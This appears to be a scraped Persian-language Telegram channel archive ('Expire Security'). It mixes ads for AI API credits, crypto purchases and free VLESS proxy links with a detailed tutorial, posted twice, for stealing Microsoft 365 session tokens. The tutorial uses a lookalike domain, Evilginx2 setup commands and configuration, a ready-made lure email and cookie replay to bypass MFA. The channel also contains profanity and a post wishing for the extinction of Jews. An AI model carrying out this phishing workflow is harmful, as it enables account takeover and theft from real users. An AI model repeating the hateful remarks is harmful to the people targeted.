ar
Feedback
ᎬᏡᏢᏆᏒᎬ ᎢᎬᎪᎷ

ᎬᏡᏢᏆᏒᎬ ᎢᎬᎪᎷ

الذهاب إلى القناة على Telegram

Dear @durov In this channel there isn't any content that violates copyright laws. Contents of this channel are for helping people. Please ignore traitors reports. Thank yo ❗️ هر استفاده نادرست به عهده خود شخص میباشد ❗️

إظهار المزيد
4 700
المشتركون
-9324 ساعات
+4217 أيام
-37230 أيام
أرشيف المشاركات
کیرم تو سالگردت

photo content

فروش محدود پکیج وب سرویس هوش مصنوعی با عکس 🔥 ساخت عکس با متن و تبدیل عکس ⚡️ حساب بصورت دلاری شارژ شده است ‼️ مخصوص توسعه دهنده ها و طراحان 🍾 مدلای زیادی داره میخاید ببینید بیاید پیوی قیمت هر ریکوئست : 100 تک تومان 💸 ظرفیت موجود : 50 هزار درخواست 🔝 لیست پکیج ها : 1️⃣ 1000 درخواست : 100.000 تومان 2️⃣ 2000 درخواست : 195.000 تومان 3️⃣ 5000 درخواست : 475.000 تومان 4️⃣ 10000 درخواست : 900.000 تومان 5️⃣ 20000 درخواست : 1.699.000 تومان جهت خرید،اطلاعات بیشتر و دریافت نمونه پیوی مراجعه کنید 💻 @SENATOR_HERO

⭕️ وب سرویس پیشرفته قیمت گیفت ⭕️ ⚙هم قیمت پورتال میده هم قیمت تونل🔵 🕦 تغییرات ۲۴ ساعته و هفتگی 🕦 🖥 نمایش مقدار سود ضرر گیفت 🖥 🔥 اشتراک ماهانه فقط و فقط ۱۰ دلار 🔥 😵🤔🙁😝 @Dev_Clown 😤☹️🙁☹️

QLPro: Automated Code Vulnerability Discovery via LLM and Static Code Analysis Integration ⚜️ @Expire_Security ⚜️

ووو سرویسی جدید از تیم سناتور وب 👀 حالا سناتور وب در پیام رسان بله راه اندازی شد ❤️‍🔥 همه امکانات دقیقاً مثل تلگرام , بدون مشکل , دسترس و سریع 👍 عضو کانال و ربات بله شو و استفاده کن: ⚡️ کانال سناتور وب در بله : @SenatorApi آیدی ربات مدیریت وب در بله : @SenatorApiBot

ارز دیجیتال اگر دارید خریدارم @SENATOR_HERO تتر ترون تون و....

vless://a6353f00-f94d-4966-bffc-d1109863960c@s3.weserver.space:5942?type=ws&path=%2F&host=telewebion.com&security=none#Telegram : @SenatorAPI
متصل

vless://a40b8dd7-9a3a-4b3a-a87c-6c302b12810b@Iran3.node-url.com:10003?security=none&type=tcp&headerType=http&path=%2F&host=#Telegram : @SenatorAPI
فعلا وصله

vless://4c445784-dadb-4156-ba39-b33fab0dc662@s2.weserver.space:3844?type=ws&path=%2F&host=telewebion.com&security=none#Userbot21147-3aj1lOAknvxQu46
تماشا کنید

منم وارد مبارزه با اسرائیل شدم
منم وارد مبارزه با اسرائیل شدم

vless://b339248c-1a86-40f5-9761-27a7e88ef60a@s3.weserver.space:5926?type=ws&path=%2F&host=telewebion.com&security=none#Userbot21004-vL5W4kux9khO1y1
40 گیگ درست مصرف کنید Like ❤️

✋ به امید منقرض شدن هرچی یهوده ✋

پروکسی سرور چیزی دارید بدید

برای این هم میتونیم از ابزار هایی که وظیفشون تولید همچین دامین هایی هست استفاده کنیم که نمونش ابزار dnstwist هست https://github.com/elceef/dnstwist که میتونه دامنه هایی که قبلا تولید شده رو هم نشون بده ⚜️ @Expire_Security ⚜️

⭐️دسترسی به حساب Microsoft 365 که با رمز عبور و تایید دومرحله‌ای MFA محافظت شده بدون نیاز به داشتن رمز یا عبور از MFA مرحله ۱ ساخت یک سایت جعلی خیلی شبیه سایت اصلی مایکروسافت کاری که می‌کنیم یه دامنه تقلبی ثبت می‌کنیم مثلا m1crosoft-support.com به جای حرف i از عدد 1 استفاده کردیم این دامنه باعث میشه کاربر فکر کنه وارد سایت اصلی مایکروسافته دامنه رو از یه جایی می‌خریم که گواهی امنیتی رایگان HTTPS میده مثل Namecheap Porkbun تنظیم می‌کنیم که این دامنه به سرور ما VPS وصل بشه مرحله ۲ راه‌اندازی ابزار Evilginx2 روی سرور Evilginx2 یه ابزار فیشینگ حرفه‌ایه که کمک می‌کنه بدون نیاز به رمز یا MFA توکن ورود Session Token قربانی رو بدزدیم ما یک سرور مجازی میخوایم یه ایپی پابلیک داشته باشه نصب ابزارها با دستور sudo apt update && sudo apt install git make gcc certbot -y git clone https://github.com/kgretzky/evilginx2.git cd evilginx2 make sudo ./bin/evilginx تنظیمات اولیه برای دامنه config domain m1crosoft-support.com config ip آی پی سرور شما config redirect_url https://login.microsoftonline.com config site microsoft enable microsoft گرفتن گواهی امنیتی HTTPS رایگان sudo certbot certonly --manual -d m1crosoft-support.com --preferred-challenges dns و بعد فایل‌های امنیتی رو به Evilginx2 معرفی میکنیم config certpath /etc/letsencrypt/live/m1crosoft-support.com/fullchain.pem config keypath /etc/letsencrypt/live/m1crosoft-support.com/privkey.pem مرحله ۳ فرستادن ایمیل جعلی فیشینگ به کاربر هدف هدف اینه که کاربر روی لینک جعلی کلیک کنه نمونه متن ایمیل میتونه به این صورت باشه موضوع : مهم تغییر اجباری رمز حساب Microsoft 365 کاربر گرامی برای امنیت بیشتر حساب شما لطفا با کلیک روی لینک زیر رمز عبور خود را تغییر دهید https://m1crosoft-support com/auth ترفندهایی که میتونیم بزنیم: جعل فرستنده ایمیل طوری که از طرف Microsoft به نظر برسه استفاده از لینک‌های کوتاه یا QR Code برای پنهان کردن لینک جعلی ارسال ایمیل در ساعات اداری برای افزایش احتمال کلیک مرحله ۴ دزدیدن Session Token بعد از کلیک کاربر وقتی کاربر روی لینک کلیک می‌کنه سایت جعلی ما باز میشه Evilginx2 اطلاعات ورود کاربر رو می‌گیره ولی هم‌زمان کاربر واقعا وارد Microsoft میشه در پشت صحنه ما توکن‌های ورود Session Token رو از مرورگر کاربر می‌گیریم مثلا چیزی شبیه این توی لاگ‌ها ظاهر میشه Captured new credentials Username user@company.com Session Tokens {...} مرحله ۵ ورود به حساب Microsoft 365 بدون رمز یا MFA الان که توکن‌ها رو داریم نیازی به رمز عبور یا تایید MFA نیست برای استفاده از توکن مرورگر مثلا Chrome رو باز کن یه تب مخفی incognito باز کن برو به DevTools F12 تب Application بخش Cookies مقادیر توکن کاربر که از Evilginx گرفتی رو به کوکی‌ها اضافه کن صفحه Microsoft 365 رو ریفرش کن ورود موفقیت آمیز بدون رمز و بدون MFA انجام میشه #red_team #phising #Evilginx2 ⚜️ @Expire_Security ⚜️

⭐️دسترسی به حساب Microsoft 365 که با رمز عبور و تایید دومرحله‌ای MFA محافظت شده بدون نیاز به داشتن رمز یا عبور از MFA مرحله ۱ ساخت یک سایت جعلی خیلی شبیه سایت اصلی مایکروسافت کاری که می‌کنیم یه دامنه تقلبی ثبت می‌کنیم مثلا m1crosoft-support.com به جای حرف i از عدد 1 استفاده کردیم این دامنه باعث میشه کاربر فکر کنه وارد سایت اصلی مایکروسافته دامنه رو از یه جایی می‌خریم که گواهی امنیتی رایگان HTTPS میده مثل Namecheap Porkbun تنظیم می‌کنیم که این دامنه به سرور ما VPS وصل بشه مرحله ۲ راه‌اندازی ابزار Evilginx2 روی سرور Evilginx2 یه ابزار فیشینگ حرفه‌ایه که کمک می‌کنه بدون نیاز به رمز یا MFA توکن ورود Session Token قربانی رو بدزدیم ما یک سرور مجازی میخوایم یه ایپی پابلیک داشته باشه نصب ابزارها با دستور sudo apt update && sudo apt install git make gcc certbot -y git clone https://github.com/kgretzky/evilginx2.git cd evilginx2 make sudo ./bin/evilginx تنظیمات اولیه برای دامنه config domain m1crosoft-support.com config ip آی پی سرور شما config redirect_url https://login.microsoftonline.com config site microsoft enable microsoft گرفتن گواهی امنیتی HTTPS رایگان sudo certbot certonly --manual -d m1crosoft-support.com --preferred-challenges dns و بعد فایل‌های امنیتی رو به Evilginx2 معرفی میکنیم config certpath /etc/letsencrypt/live/m1crosoft-support.com/fullchain.pem config keypath /etc/letsencrypt/live/m1crosoft-support.com/privkey.pem مرحله ۳ فرستادن ایمیل جعلی فیشینگ به کاربر هدف هدف اینه که کاربر روی لینک جعلی کلیک کنه نمونه متن ایمیل میتونه به این صورت باشه موضوع : مهم تغییر اجباری رمز حساب Microsoft 365 کاربر گرامی برای امنیت بیشتر حساب شما لطفا با کلیک روی لینک زیر رمز عبور خود را تغییر دهید https://m1crosoft-support com/auth ترفندهایی که میتونیم بزنیم: جعل فرستنده ایمیل طوری که از طرف Microsoft به نظر برسه استفاده از لینک‌های کوتاه یا QR Code برای پنهان کردن لینک جعلی ارسال ایمیل در ساعات اداری برای افزایش احتمال کلیک مرحله ۴ دزدیدن Session Token بعد از کلیک کاربر وقتی کاربر روی لینک کلیک می‌کنه سایت جعلی ما باز میشه Evilginx2 اطلاعات ورود کاربر رو می‌گیره ولی هم‌زمان کاربر واقعا وارد Microsoft میشه در پشت صحنه ما توکن‌های ورود Session Token رو از مرورگر کاربر می‌گیریم مثلا چیزی شبیه این توی لاگ‌ها ظاهر میشه Captured new credentials Username user@company.com Session Tokens {...} مرحله ۵ ورود به حساب Microsoft 365 بدون رمز یا MFA الان که توکن‌ها رو داریم نیازی به رمز عبور یا تایید MFA نیست برای استفاده از توکن مرورگر مثلا Chrome رو باز کن یه تب مخفی incognito باز کن برو به DevTools F12 تب Application بخش Cookies مقادیر توکن کاربر که از Evilginx گرفتی رو به کوکی‌ها اضافه کن صفحه Microsoft 365 رو ریفرش کن ورود موفقیت آمیز بدون رمز و بدون MFA انجام میشه #red_team #phising #Evilginx2 ⚜️ @Expire_Security ⚜️

⚜️ @Expire_Security ⚜️